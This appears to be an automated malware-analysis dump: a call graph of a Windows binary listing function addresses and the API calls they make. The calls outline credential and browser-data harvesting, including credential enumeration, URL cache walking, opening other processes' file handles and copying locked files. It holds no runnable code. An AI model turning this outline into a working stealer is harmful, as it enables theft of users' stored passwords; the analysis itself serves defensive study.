                                                                                                                                             • 412863 CoInitialize -> 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW -> 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW -> message loop at 4128ca: 4128d0 TranslateAcceleratorW, 4128fd / 412909 / 41291f IsDialogMessageW, 41292b TranslateMessage DispatchMessageW, 412941 GetMessageW -> 412957 CoUninitialize -> 4125b6 ??3@YAXPAX -> 4125e6 DeleteObject -> 40b1ab free free -> 41296f -> 40b633 free -> 412789
                                                                                                                                             • 44553b -> 40c768; 4455a8 memset -> 403988; 4457f2 -> 403e2d memset (five calls); 445854 -> 403c9c memset (five calls); 4458bb / 44595e / 445a00 / 445b38 / 445c8b / 445d88 memset memset -> 414c2e 16 API calls -> 40b2cc -> 409d1f wcslen wcslen -> 409b98 GetFileAttributesW; 403fbe memset (five calls); 4087b3 memset (338 API calls); 40b6ef 252 API calls; 445389 258 API calls; 4454bf 20 API calls; 4452e5 45 API calls; 445093 23 API calls; 445403 memset; 40ae18; 413d4c; 413fa6 _wcsicmp; 4099c6 wcslen; 445d54 _wcsicmp
                                                                                                                                             • 4032b4 loop: 4033a9 memset memcpy -> 4033ec wcscmp; 403421 _wcsicmp; 4028e7 11 API calls; 40f508 6 API calls; 40368c 15 API calls
                                                                                                                                             • separate roots: 441a73 147 API calls; 442ec6 19 API calls; 4152c6 malloc -> 416760 11 API calls; 441819 -> 430737 -> 43034a memcpy / 4169a7 11 API calls / 430819 memset / 415b2c -> 4438b5 10 API calls / 415b79 memcpy
_wcsicmp 39074->39434 39079 409d1f 6 API calls 39075->39079 39077 445e12 39084 445e6b 39077->39084 39090 40b2cc 27 API calls 39077->39090 39082 445c37 39079->39082 39080 445aa1 39083 445b17 39080->39083 39098 445ab2 memset 39080->39098 39111 409d1f 6 API calls 39080->39111 39407 40add4 39080->39407 39412 445389 39080->39412 39421 40ae51 39080->39421 39081 4456eb 39086 4456fd memset memset memset memset 39081->39086 39087 4457ea 39081->39087 39088 445389 258 API calls 39082->39088 39515 40aebe 39083->39515 39542 445093 23 API calls 39084->39542 39435 409c70 wcscpy wcsrchr 39086->39435 39438 413d29 39087->39438 39093 445c47 39088->39093 39094 445e33 39090->39094 39100 40b2cc 27 API calls 39093->39100 39101 409d1f 6 API calls 39094->39101 39096 445e7e 39097 445f67 39096->39097 39106 40b2cc 27 API calls 39097->39106 39102 40b2cc 27 API calls 39098->39102 39104 445c53 39100->39104 39105 445e47 39101->39105 39102->39080 39103 409c70 2 API calls 39107 44577e 39103->39107 39108 409d1f 6 API calls 39104->39108 39541 409b98 GetFileAttributesW 39105->39541 39110 445f73 39106->39110 39112 409c70 2 API calls 39107->39112 39113 445c67 39108->39113 39115 409d1f 6 API calls 39110->39115 39111->39080 39116 44578d 39112->39116 39117 445389 258 API calls 39113->39117 39114 445e56 39114->39084 39120 445e83 memset 39114->39120 39118 445f87 39115->39118 39116->39087 39123 40b2cc 27 API calls 39116->39123 39117->38979 39545 409b98 GetFileAttributesW 39118->39545 39122 40b2cc 27 API calls 39120->39122 39125 445eab 39122->39125 39126 4457a8 39123->39126 39124->39005 39124->39068 39127 409d1f 6 API calls 39125->39127 39128 409d1f 6 API calls 39126->39128 39129 445ebf 39127->39129 39130 4457b8 39128->39130 39131 40ae18 9 API calls 39129->39131 39141 445ef5 39131->39141 39134 40ae51 9 API calls 39134->39141 39136 445f5c 39138 40aebe FindClose 39136->39138 39137 40add4 2 API calls 39137->39141 39138->39097 39139 40b2cc 27 API calls 39139->39141 39140 409d1f 6 API calls 39140->39141 
39141->39134 39141->39136 39141->39137 39141->39139 39141->39140 39143 445f3a 39141->39143 39543 409b98 GetFileAttributesW 39141->39543 39544 445093 23 API calls 39143->39544 39145->38945 39146->38947 39147->38945 39148->38940 39150 40c775 39149->39150 39546 40b1ab free free 39150->39546 39152 40c788 39547 40b1ab free free 39152->39547 39154 40c790 39548 40b1ab free free 39154->39548 39156 40c798 39157 40aa04 free 39156->39157 39158 40c7a0 39157->39158 39549 40c274 memset 39158->39549 39163 40a8ab 9 API calls 39164 40c7c3 39163->39164 39165 40a8ab 9 API calls 39164->39165 39166 40c7d0 39165->39166 39578 40c3c3 39166->39578 39170 40c7e5 39171 40c877 39170->39171 39172 40c86c 39170->39172 39178 40c634 49 API calls 39170->39178 39603 40a706 39170->39603 39179 40bdb0 39171->39179 39620 4053fe 39 API calls 39172->39620 39178->39170 39810 404363 39179->39810 39182 40bf5d 39830 40440c 39182->39830 39184 40bdee 39184->39182 39187 40b2cc 27 API calls 39184->39187 39185 40bddf CredEnumerateW 39185->39184 39233 40399d 39232->39233 39876 403a16 39233->39876 39235 403a09 39890 40b1ab free free 39235->39890 39237 4039a3 39237->39235 39241 4039f4 39237->39241 39887 40a02c CreateFileW 39237->39887 39238 403a12 wcsrchr 39238->38968 39241->39235 39242 4099c6 2 API calls 39241->39242 39242->39235 39244 414c2e 16 API calls 39243->39244 39245 404048 39244->39245 39246 414c2e 16 API calls 39245->39246 39247 404056 39246->39247 39248 409d1f 6 API calls 39247->39248 39249 404073 39248->39249 39250 409d1f 6 API calls 39249->39250 39251 40408e 39250->39251 39252 409d1f 6 API calls 39251->39252 39253 4040a6 39252->39253 39254 403af5 20 API calls 39253->39254 39255 4040ba 39254->39255 39256 403af5 20 API calls 39255->39256 39257 4040cb 39256->39257 39917 40414f memset 39257->39917 39259 404140 39931 40b1ab free free 39259->39931 39261 4040ec memset 39264 4040e0 39261->39264 39262 404148 39262->39025 39263 4099c6 2 API calls 39263->39264 39264->39259 39264->39261 39264->39263 39265 40a8ab 9 
API calls 39264->39265 39265->39264 39944 40a6e6 WideCharToMultiByte 39266->39944 39318 40b633 free 39317->39318 39319 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39318->39319 39320 413f00 Process32NextW 39319->39320 39321 413da5 OpenProcess 39320->39321 39322 413f17 CloseHandle 39320->39322 39323 413df3 memset 39321->39323 39328 413eb0 39321->39328 39322->39063 40183 413f27 39323->40183 39325 413ebf free 39325->39328 39326 4099f4 3 API calls 39326->39328 39328->39320 39328->39325 39328->39326 39329 413e37 GetModuleHandleW 39330 413e1f 39329->39330 39331 413e46 GetProcAddress 39329->39331 39330->39329 40188 413959 39330->40188 40204 413ca4 39330->40204 39331->39330 39333 413ea2 CloseHandle 39333->39328 39335 414c2e 16 API calls 39334->39335 39336 403eb7 39335->39336 39337 414c2e 16 API calls 39336->39337 39338 403ec5 39337->39338 39339 409d1f 6 API calls 39338->39339 39340 403ee2 39339->39340 39341 409d1f 6 API calls 39340->39341 39342 403efd 39341->39342 39343 409d1f 6 API calls 39342->39343 39344 403f15 39343->39344 39345 403af5 20 API calls 39344->39345 39346 403f29 39345->39346 39347 403af5 20 API calls 39346->39347 39348 403f3a 39347->39348 39349 40414f 33 API calls 39348->39349 39354 403f4f 39349->39354 39350 403faf 40218 40b1ab free free 39350->40218 39352 403f5b memset 39352->39354 39353 403fb7 39353->39009 39354->39350 39354->39352 39355 4099c6 2 API calls 39354->39355 39356 40a8ab 9 API calls 39354->39356 39355->39354 39356->39354 39358 414c2e 16 API calls 39357->39358 39359 403d26 39358->39359 39360 414c2e 16 API calls 39359->39360 39361 403d34 39360->39361 39362 409d1f 6 API calls 39361->39362 39363 403d51 39362->39363 39364 409d1f 6 API calls 39363->39364 39365 403d6c 39364->39365 39366 409d1f 6 API calls 39365->39366 39367 403d84 39366->39367 39368 403af5 20 API calls 39367->39368 39369 403d98 39368->39369 39370 403af5 20 API calls 39369->39370 39371 403da9 39370->39371 39372 40414f 33 API calls 39371->39372 39373 403dbe 39372->39373 39374 
403e1e 39373->39374 39375 403dca memset 39373->39375 39378 4099c6 2 API calls 39373->39378 39379 40a8ab 9 API calls 39373->39379 40219 40b1ab free free 39374->40219 39375->39373 39377 403e26 39377->39013 39378->39373 39379->39373 39381 414b81 9 API calls 39380->39381 39382 414c40 39381->39382 39383 414c73 memset 39382->39383 40220 409cea 39382->40220 39384 414c94 39383->39384 40223 414592 RegOpenKeyExW 39384->40223 39388 414c64 39388->39003 39389 414cc1 39390 414cf4 wcscpy 39389->39390 40224 414bb0 wcscpy 39389->40224 39390->39388 39392 414cd2 40225 4145ac RegQueryValueExW 39392->40225 39394 414ce9 RegCloseKey 39394->39390 39396 409d62 39395->39396 39397 409d43 wcscpy 39395->39397 39396->39045 39398 409719 2 API calls 39397->39398 39399 409d51 wcscat 39398->39399 39399->39396 39401 40aebe FindClose 39400->39401 39402 40ae21 39401->39402 39403 4099c6 2 API calls 39402->39403 39404 40ae35 39403->39404 39405 409d1f 6 API calls 39404->39405 39406 40ae49 39405->39406 39406->39080 39408 40ade0 39407->39408 39409 40ae0f 39407->39409 39408->39409 39410 40ade7 wcscmp 39408->39410 39409->39080 39410->39409 39411 40adfe wcscmp 39410->39411 39411->39409 39413 40ae18 9 API calls 39412->39413 39419 4453c4 39413->39419 39414 40ae51 9 API calls 39414->39419 39415 4453f3 39417 40aebe FindClose 39415->39417 39416 40add4 2 API calls 39416->39419 39418 4453fe 39417->39418 39418->39080 39419->39414 39419->39415 39419->39416 39420 445403 253 API calls 39419->39420 39420->39419 39422 40ae7b FindNextFileW 39421->39422 39423 40ae5c FindFirstFileW 39421->39423 39424 40ae94 39422->39424 39425 40ae8f 39422->39425 39423->39424 39427 409d1f 6 API calls 39424->39427 39428 40aeb6 39424->39428 39426 40aebe FindClose 39425->39426 39426->39424 39427->39428 39428->39080 39431->39066 39432->39047 39434->39081 39436 409c89 39435->39436 39436->39103 39439 413d39 39438->39439 39440 413d2f FreeLibrary 39438->39440 39441 40b633 free 39439->39441 39440->39439 39442 413d42 39441->39442 39443 40b633 free 
39442->39443 39444 413d4a 39443->39444 39444->38960 39445->38964 39446->39015 39447->39029 39449 44db70 39448->39449 39450 40b6fc memset 39449->39450 39451 409c70 2 API calls 39450->39451 39452 40b732 wcsrchr 39451->39452 39453 40b743 39452->39453 39454 40b746 memset 39452->39454 39453->39454 39455 40b2cc 27 API calls 39454->39455 39456 40b76f 39455->39456 39457 409d1f 6 API calls 39456->39457 39458 40b783 39457->39458 40226 409b98 GetFileAttributesW 39458->40226 39460 40b792 39461 40b7c2 39460->39461 39462 409c70 2 API calls 39460->39462 40227 40bb98 39461->40227 39464 40b7a5 39462->39464 39466 40b2cc 27 API calls 39464->39466 39469 40b7b2 39466->39469 39467 40b837 CloseHandle 39471 40b83e memset 39467->39471 39468 40b817 40261 409a45 GetTempPathW 39468->40261 39473 409d1f 6 API calls 39469->39473 40260 40a6e6 WideCharToMultiByte 39471->40260 39473->39461 39474 40b827 CopyFileW 39474->39471 39475 40b866 39476 444432 121 API calls 39475->39476 39477 40b879 39476->39477 39478 40bad5 39477->39478 39479 40b273 27 API calls 39477->39479 39480 40baeb 39478->39480 39481 40bade DeleteFileW 39478->39481 39482 40b89a 39479->39482 39483 40b04b ??3@YAXPAX 39480->39483 39481->39480 39484 438552 134 API calls 39482->39484 39485 40baf3 39483->39485 39486 40b8a4 39484->39486 39485->39039 39487 40bacd 39486->39487 39489 4251c4 137 API calls 39486->39489 39488 443d90 111 API calls 39487->39488 39488->39478 39512 40b8b8 39489->39512 39490 40bac6 40273 424f26 123 API calls 39490->40273 39491 40b8bd memset 40264 425413 17 API calls 39491->40264 39494 425413 17 API calls 39494->39512 39497 40a71b MultiByteToWideChar 39497->39512 39498 40a734 MultiByteToWideChar 39498->39512 39501 40b9b5 memcmp 39501->39512 39502 4099c6 2 API calls 39502->39512 39503 404423 37 API calls 39503->39512 39505 40bb3e memset memcpy 40274 40a734 MultiByteToWideChar 39505->40274 39506 4251c4 137 API calls 39506->39512 39509 40bb88 LocalFree 39509->39512 39512->39490 39512->39491 39512->39494 39512->39497 
39512->39498 39512->39501 39512->39502 39512->39503 39512->39505 39512->39506 39513 40ba5f memcmp 39512->39513 40265 4253ef 16 API calls 39512->40265 40266 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39512->40266 40267 4253af 17 API calls 39512->40267 40268 4253cf 17 API calls 39512->40268 40269 447280 memset 39512->40269 40270 447960 memset memcpy memcpy memcpy 39512->40270 40271 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39512->40271 40272 447920 memcpy memcpy memcpy 39512->40272 39513->39512 39514->39041 39516 40aed1 39515->39516 39517 40aec7 FindClose 39515->39517 39516->38973 39517->39516 39519 4099d7 39518->39519 39520 4099da memcpy 39518->39520 39519->39520 39520->39024 39522 40b2cc 27 API calls 39521->39522 39523 44543f 39522->39523 39524 409d1f 6 API calls 39523->39524 39525 44544f 39524->39525 40366 409b98 GetFileAttributesW 39525->40366 39527 44545e 39528 445476 39527->39528 39529 40b6ef 252 API calls 39527->39529 39530 40b2cc 27 API calls 39528->39530 39529->39528 39531 445482 39530->39531 39532 409d1f 6 API calls 39531->39532 39533 445492 39532->39533 40367 409b98 GetFileAttributesW 39533->40367 39535 4454a1 39536 4454b9 39535->39536 39537 40b6ef 252 API calls 39535->39537 39536->39055 39537->39536 39538->39054 39539->39071 39540->39077 39541->39114 39542->39096 39543->39141 39544->39141 39545->39124 39546->39152 39547->39154 39548->39156 39550 414c2e 16 API calls 39549->39550 39551 40c2ae 39550->39551 39621 40c1d3 39551->39621 39556 40c3be 39573 40a8ab 39556->39573 39557 40afcf 2 API calls 39558 40c2fd FindFirstUrlCacheEntryW 39557->39558 39559 40c3b6 39558->39559 39560 40c31e wcschr 39558->39560 39561 40b04b ??3@YAXPAX 39559->39561 39562 40c331 39560->39562 39563 40c35e FindNextUrlCacheEntryW 39560->39563 39561->39556 39564 40a8ab 9 API calls 39562->39564 39563->39560 39565 40c373 GetLastError 39563->39565 39568 40c33e wcschr 39564->39568 39566 40c3ad FindCloseUrlCache 39565->39566 39567 40c37e 39565->39567 39566->39559 39569 40afcf 2 API calls 
39567->39569 39568->39563 39570 40c34f 39568->39570 39571 40c391 FindNextUrlCacheEntryW 39569->39571 39572 40a8ab 9 API calls 39570->39572 39571->39560 39571->39566 39572->39563 39737 40a97a 39573->39737 39576 40a8cc 39576->39163 39577 40a8d0 7 API calls 39577->39576 39742 40b1ab free free 39578->39742 39580 40c3dd 39581 40b2cc 27 API calls 39580->39581 39582 40c3e7 39581->39582 39743 414592 RegOpenKeyExW 39582->39743 39584 40c3f4 39585 40c50e 39584->39585 39586 40c3ff 39584->39586 39600 405337 39585->39600 39587 40a9ce 4 API calls 39586->39587 39588 40c418 memset 39587->39588 39744 40aa1d 39588->39744 39591 40c471 39593 40c47a _wcsupr 39591->39593 39592 40c505 RegCloseKey 39592->39585 39594 40a8d0 7 API calls 39593->39594 39595 40c498 39594->39595 39596 40a8d0 7 API calls 39595->39596 39597 40c4ac memset 39596->39597 39598 40aa1d 39597->39598 39599 40c4e4 RegEnumValueW 39598->39599 39599->39592 39599->39593 39746 405220 39600->39746 39604 4099c6 2 API calls 39603->39604 39605 40a714 _wcslwr 39604->39605 39606 40c634 39605->39606 39803 405361 39606->39803 39609 40c65c wcslen 39806 4053b6 39 API calls 39609->39806 39610 40c71d wcslen 39610->39170 39620->39171 39622 40ae18 9 API calls 39621->39622 39628 40c210 39622->39628 39623 40ae51 9 API calls 39623->39628 39624 40c264 39625 40aebe FindClose 39624->39625 39627 40c26f 39625->39627 39626 40add4 2 API calls 39626->39628 39633 40e5ed memset memset 39627->39633 39628->39623 39628->39624 39628->39626 39629 40c231 _wcsicmp 39628->39629 39630 40c1d3 35 API calls 39628->39630 39629->39628 39631 40c248 39629->39631 39630->39628 39646 40c084 22 API calls 39631->39646 39634 414c2e 16 API calls 39633->39634 39635 40e63f 39634->39635 39636 409d1f 6 API calls 39635->39636 39637 40e658 39636->39637 39647 409b98 GetFileAttributesW 39637->39647 39639 40e667 39640 40e680 39639->39640 39642 409d1f 6 API calls 39639->39642 39648 409b98 GetFileAttributesW 39640->39648 39642->39640 39643 40e68f 39644 40c2d8 39643->39644 39649 40e4b2 
39643->39649 39644->39556 39644->39557 39646->39628 39647->39639 39648->39643 39670 40e01e 39649->39670 39651 40e593 39653 40e5b0 39651->39653 39654 40e59c DeleteFileW 39651->39654 39652 40e521 39652->39651 39693 40e175 39652->39693 39655 40b04b ??3@YAXPAX 39653->39655 39654->39653 39656 40e5bb 39655->39656 39658 40e5c4 CloseHandle 39656->39658 39659 40e5cc 39656->39659 39658->39659 39661 40b633 free 39659->39661 39660 40e573 39662 40e584 39660->39662 39663 40e57c CloseHandle 39660->39663 39664 40e5db 39661->39664 39736 40b1ab free free 39662->39736 39663->39662 39667 40b633 free 39664->39667 39666 40e540 39666->39660 39713 40e2ab 39666->39713 39668 40e5e3 39667->39668 39668->39644 39671 406214 22 API calls 39670->39671 39672 40e03c 39671->39672 39673 40e16b 39672->39673 39674 40dd85 74 API calls 39672->39674 39673->39652 39675 40e06b 39674->39675 39675->39673 39676 40afcf ??2@YAPAXI ??3@YAXPAX 39675->39676 39677 40e08d OpenProcess 39676->39677 39678 40e0a4 GetCurrentProcess DuplicateHandle 39677->39678 39682 40e152 39677->39682 39679 40e0d0 GetFileSize 39678->39679 39680 40e14a CloseHandle 39678->39680 39683 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39679->39683 39680->39682 39681 40e160 39685 40b04b ??3@YAXPAX 39681->39685 39682->39681 39684 406214 22 API calls 39682->39684 39686 40e0ea 39683->39686 39684->39681 39685->39673 39687 4096dc CreateFileW 39686->39687 39688 40e0f1 CreateFileMappingW 39687->39688 39689 40e140 CloseHandle CloseHandle 39688->39689 39690 40e10b MapViewOfFile 39688->39690 39689->39680 39691 40e13b CloseHandle 39690->39691 39692 40e11f WriteFile UnmapViewOfFile 39690->39692 39691->39689 39692->39691 39694 40e18c 39693->39694 39695 406b90 11 API calls 39694->39695 39696 40e19f 39695->39696 39697 40e1a7 memset 39696->39697 39698 40e299 39696->39698 39703 40e1e8 39697->39703 39699 4069a3 ??3@YAXPAX free 39698->39699 39700 40e2a4 39699->39700 39700->39666 39701 406e8f 13 API calls 39701->39703 39702 406b53 SetFilePointerEx 
ReadFile 39702->39703 39703->39701 39703->39702 39704 40e283 39703->39704 39705 40dd50 _wcsicmp 39703->39705 39709 40742e 8 API calls 39703->39709 39710 40aae3 wcslen wcslen _memicmp 39703->39710 39711 40e244 _snwprintf 39703->39711 39706 40e291 39704->39706 39707 40e288 free 39704->39707 39705->39703 39708 40aa04 free 39706->39708 39707->39706 39708->39698 39709->39703 39710->39703 39712 40a8d0 7 API calls 39711->39712 39712->39703 39714 40e2c2 39713->39714 39715 406b90 11 API calls 39714->39715 39726 40e2d3 39715->39726 39716 40e4a0 39717 4069a3 ??3@YAXPAX free 39716->39717 39719 40e4ab 39717->39719 39718 406e8f 13 API calls 39718->39726 39719->39666 39720 406b53 SetFilePointerEx ReadFile 39720->39726 39721 40e489 39722 40aa04 free 39721->39722 39724 40e491 39722->39724 39723 40dd50 _wcsicmp 39723->39726 39724->39716 39725 40e497 free 39724->39725 39725->39716 39726->39716 39726->39718 39726->39720 39726->39721 39726->39723 39727 40dd50 _wcsicmp 39726->39727 39730 40742e 8 API calls 39726->39730 39731 40e3e0 memcpy 39726->39731 39732 40e3b3 wcschr 39726->39732 39733 40e3fb memcpy 39726->39733 39734 40e416 memcpy 39726->39734 39735 40e431 memcpy 39726->39735 39728 40e376 memset 39727->39728 39729 40aa29 6 API calls 39728->39729 39729->39726 39730->39726 39731->39726 39732->39726 39733->39726 39734->39726 39735->39726 39736->39651 39739 40a980 39737->39739 39738 40a8bb 39738->39576 39738->39577 39739->39738 39740 40a995 _wcsicmp 39739->39740 39741 40a99c wcscmp 39739->39741 39740->39739 39741->39739 39742->39580 39743->39584 39745 40aa23 RegEnumValueW 39744->39745 39745->39591 39745->39592 39747 405335 39746->39747 39748 40522a 39746->39748 39747->39170 39749 40b2cc 27 API calls 39748->39749 39750 405234 39749->39750 39751 40a804 8 API calls 39750->39751 39752 40523a 39751->39752 39791 40b273 39752->39791 39754 405248 _mbscpy _mbscat GetProcAddress 39755 40b273 27 API calls 39754->39755 39756 405279 39755->39756 39794 405211 GetProcAddress 39756->39794 39792 40b58d 
27 API calls 39791->39792 39793 40b18c 39792->39793 39793->39754 39804 405220 39 API calls 39803->39804 39805 405369 39804->39805 39805->39609 39805->39610 39811 40440c FreeLibrary 39810->39811 39812 40436d 39811->39812 39813 40a804 8 API calls 39812->39813 39814 404377 39813->39814 39815 404383 39814->39815 39816 404405 39814->39816 39817 40b273 27 API calls 39815->39817 39816->39182 39816->39184 39816->39185 39818 40438d GetProcAddress 39817->39818 39877 403a29 39876->39877 39891 403bed memset memset 39877->39891 39879 403ae7 39904 40b1ab free free 39879->39904 39880 403a3f memset 39886 403a2f 39880->39886 39882 403aef 39882->39237 39883 409b98 GetFileAttributesW 39883->39886 39884 40a8d0 7 API calls 39884->39886 39885 409d1f 6 API calls 39885->39886 39886->39879 39886->39880 39886->39883 39886->39884 39886->39885 39888 40a051 GetFileTime CloseHandle 39887->39888 39889 4039ca CompareFileTime 39887->39889 39888->39889 39889->39237 39890->39238 39892 414c2e 16 API calls 39891->39892 39893 403c38 39892->39893 39894 409719 2 API calls 39893->39894 39895 403c3f wcscat 39894->39895 39896 414c2e 16 API calls 39895->39896 39897 403c61 39896->39897 39898 409719 2 API calls 39897->39898 39899 403c68 wcscat 39898->39899 39905 403af5 39899->39905 39902 403af5 20 API calls 39903 403c95 39902->39903 39903->39886 39904->39882 39906 403b02 39905->39906 39907 40ae18 9 API calls 39906->39907 39915 403b37 39907->39915 39908 403bdb 39910 40aebe FindClose 39908->39910 39909 40add4 wcscmp wcscmp 39909->39915 39911 403be6 39910->39911 39911->39902 39912 40ae18 9 API calls 39912->39915 39913 40ae51 9 API calls 39913->39915 39914 40aebe FindClose 39914->39915 39915->39908 39915->39909 39915->39912 39915->39913 39915->39914 39916 40a8d0 7 API calls 39915->39916 39916->39915 39918 409d1f 6 API calls 39917->39918 39919 404190 39918->39919 39932 409b98 GetFileAttributesW 39919->39932 39921 40419c 39922 4041a7 6 API calls 39921->39922 39923 40435c 39921->39923 39924 40424f 39922->39924 
39923->39264 39924->39923 39926 40425e memset 39924->39926 39928 409d1f 6 API calls 39924->39928 39929 40a8ab 9 API calls 39924->39929 39933 414842 39924->39933 39926->39924 39927 404296 wcscpy 39926->39927 39927->39924 39928->39924 39930 4042b6 memset memset _snwprintf wcscpy 39929->39930 39930->39924 39931->39262 39932->39921 39936 41443e 39933->39936 39935 414866 39935->39924 39937 41444b 39936->39937 39938 414451 39937->39938 39939 4144a3 GetPrivateProfileStringW 39937->39939 39940 414491 39938->39940 39941 414455 wcschr 39938->39941 39939->39935 39942 414495 WritePrivateProfileStringW 39940->39942 39941->39940 39943 414463 _snwprintf 39941->39943 39942->39935 39943->39942 40210 413f4f 40183->40210 40186 413f37 K32GetModuleFileNameExW 40187 413f4a 40186->40187 40187->39330 40189 413969 wcscpy 40188->40189 40190 41396c wcschr 40188->40190 40202 413a3a 40189->40202 40190->40189 40192 41398e 40190->40192 40215 4097f7 wcslen wcslen _memicmp 40192->40215 40194 41399a 40195 4139a4 memset 40194->40195 40196 4139e6 40194->40196 40216 409dd5 GetWindowsDirectoryW wcscpy 40195->40216 40198 413a31 wcscpy 40196->40198 40199 4139ec memset 40196->40199 40198->40202 40217 409dd5 GetWindowsDirectoryW wcscpy 40199->40217 40200 4139c9 wcscpy wcscat 40200->40202 40202->39330 40203 413a11 memcpy wcscat 40203->40202 40205 413cb0 GetModuleHandleW 40204->40205 40206 413cda 40204->40206 40205->40206 40207 413cbf GetProcAddress 40205->40207 40208 413ce3 GetProcessTimes 40206->40208 40209 413cf6 40206->40209 40207->40206 40208->39333 40209->39333 40211 413f2f 40210->40211 40212 413f54 40210->40212 40211->40186 40211->40187 40213 40a804 8 API calls 40212->40213 40214 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40213->40214 40214->40211 40215->40194 40216->40200 40217->40203 40218->39353 40219->39377 40221 409cf9 GetVersionExW 40220->40221 40222 409d0a 40220->40222 40221->40222 40222->39383 40222->39388 40223->39389 40224->39392 40225->39394 
40226->39460 40228 40bba5 40227->40228 40275 40cc26 40228->40275 40231 40bd4b 40296 40cc0c 40231->40296 40236 40b2cc 27 API calls 40237 40bbef 40236->40237 40303 40ccf0 _wcsicmp 40237->40303 40239 40bbf5 40239->40231 40304 40ccb4 6 API calls 40239->40304 40241 40bc26 40242 40cf04 17 API calls 40241->40242 40243 40bc2e 40242->40243 40244 40bd43 40243->40244 40245 40b2cc 27 API calls 40243->40245 40246 40cc0c 4 API calls 40244->40246 40247 40bc40 40245->40247 40246->40231 40305 40ccf0 _wcsicmp 40247->40305 40249 40bc46 40249->40244 40250 40bc61 memset memset WideCharToMultiByte 40249->40250 40306 40103c strlen 40250->40306 40252 40bcc0 40253 40b273 27 API calls 40252->40253 40254 40bcd0 memcmp 40253->40254 40254->40244 40255 40bce2 40254->40255 40256 404423 37 API calls 40255->40256 40257 40bd10 40256->40257 40257->40244 40258 40bd3a LocalFree 40257->40258 40259 40bd1f memcpy 40257->40259 40258->40244 40259->40258 40260->39475 40262 409a74 GetTempFileNameW 40261->40262 40263 409a66 GetWindowsDirectoryW 40261->40263 40262->39474 40263->40262 40264->39512 40265->39512 40266->39512 40267->39512 40268->39512 40269->39512 40270->39512 40271->39512 40272->39512 40273->39487 40274->39509 40307 4096c3 CreateFileW 40275->40307 40277 40cc34 40278 40cc3d GetFileSize 40277->40278 40286 40bbca 40277->40286 40279 40afcf 2 API calls 40278->40279 40280 40cc64 40279->40280 40308 40a2ef ReadFile 40280->40308 40282 40cc71 40309 40ab4a MultiByteToWideChar 40282->40309 40284 40cc95 CloseHandle 40285 40b04b ??3@YAXPAX 40284->40285 40285->40286 40286->40231 40287 40cf04 40286->40287 40288 40b633 free 40287->40288 40289 40cf14 40288->40289 40315 40b1ab free free 40289->40315 40291 40bbdd 40291->40231 40291->40236 40292 40cf1b 40292->40291 40294 40cfef 40292->40294 40316 40cd4b 40292->40316 40295 40cd4b 14 API calls 40294->40295 40295->40291 40297 40b633 free 40296->40297 40298 40cc15 40297->40298 40299 40aa04 free 40298->40299 40300 40cc1d 40299->40300 40365 40b1ab free free 40300->40365 
40302 40b7d4 memset CreateFileW 40302->39467 40302->39468 40303->40239 40304->40241 40305->40249 40306->40252 40307->40277 40308->40282 40310 40ab6b 40309->40310 40314 40ab93 40309->40314 40311 40a9ce 4 API calls 40310->40311 40312 40ab74 40311->40312 40313 40ab7c MultiByteToWideChar 40312->40313 40313->40314 40314->40284 40315->40292 40317 40cd7b 40316->40317 40350 40aa29 40317->40350 40319 40cef5 40320 40aa04 free 40319->40320 40321 40cefd 40320->40321 40321->40292 40323 40aa29 6 API calls 40324 40ce1d 40323->40324 40325 40aa29 6 API calls 40324->40325 40326 40ce3e 40325->40326 40327 40ce6a 40326->40327 40358 40abb7 wcslen memmove 40326->40358 40328 40ce9f 40327->40328 40361 40abb7 wcslen memmove 40327->40361 40330 40a8d0 7 API calls 40328->40330 40333 40ceb5 40330->40333 40331 40ce56 40359 40aa71 wcslen 40331->40359 40339 40a8d0 7 API calls 40333->40339 40335 40ce8b 40362 40aa71 wcslen 40335->40362 40336 40ce5e 40360 40abb7 wcslen memmove 40336->40360 40342 40cecb 40339->40342 40340 40ce93 40363 40abb7 wcslen memmove 40340->40363 40364 40d00b malloc memcpy free free 40342->40364 40344 40cedd 40345 40aa04 free 40344->40345 40346 40cee5 40345->40346 40347 40aa04 free 40346->40347 40348 40ceed 40347->40348 40349 40aa04 free 40348->40349 40349->40319 40351 40aa33 40350->40351 40352 40aa63 40350->40352 40353 40aa44 40351->40353 40354 40aa38 wcslen 40351->40354 40352->40319 40352->40323 40355 40a9ce malloc memcpy free free 40353->40355 40354->40353 40356 40aa4d 40355->40356 40356->40352 40357 40aa51 memcpy 40356->40357 40357->40352 40358->40331 40359->40336 40360->40327 40361->40335 40362->40340 40363->40328 40364->40344 40365->40302 40366->39527 40367->39535 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 37854 4426a9 37859 4324d3 37854->37859 37856 4426d2 37873 431a7b 37856->37873 37858 4426e3 37860 4324e3 37859->37860 37861 4324da 37859->37861 37865 4324e8 37860->37865 37945 43240a 12 API calls 37860->37945 37941 415a91 

Control-flow Graph
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
